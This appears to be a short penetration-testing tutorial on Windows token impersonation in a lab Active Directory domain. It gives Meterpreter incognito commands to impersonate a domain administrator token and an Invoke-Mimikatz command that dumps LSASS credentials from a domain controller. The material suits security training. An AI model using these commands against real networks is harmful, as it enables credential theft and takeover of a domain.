Tokens are temporary keys that allow a user to perform actions on a system or network without having to provide a password; similar to session cookies on a web site. The tokens are generated once a user logs onto a system or RDP session. They remain until the system is rebooted.
Types of Tokens
- Delegate: Created for logging into a machine or RDP
- Impersonate: Used for non-interactive authentication such as network drive mapping
Ideally, you want to find tokens of a domain administrator in order expose additional attack vectors against the domain controller.
To move laterally across different computers on the domain, you could do this via passing hashes or passwords or users that have privileges across multiple systems; or by compromising additional vulnerable services.
Dumping Tokens with Metasploit
meterpreter > load incognito meterpreter > list_tokens -u meterpreter > impersonate_token domain\\administrator
Now, that we are running in the context of a domain administrator, we could use a tool like
Invoke-Mimikatz to dump the LSASS on the domain controller.
PS C:\ > hostname Win10Ent1 PS C:\ > Invoke-Mimikatz -Command '"privilege::debug" "LSADump::LSA /inject" exit' -Computer DC1.ad.lab
Revert Msfconsole Shell
This will revert the meterpreter session to its original state
meterpreter > revself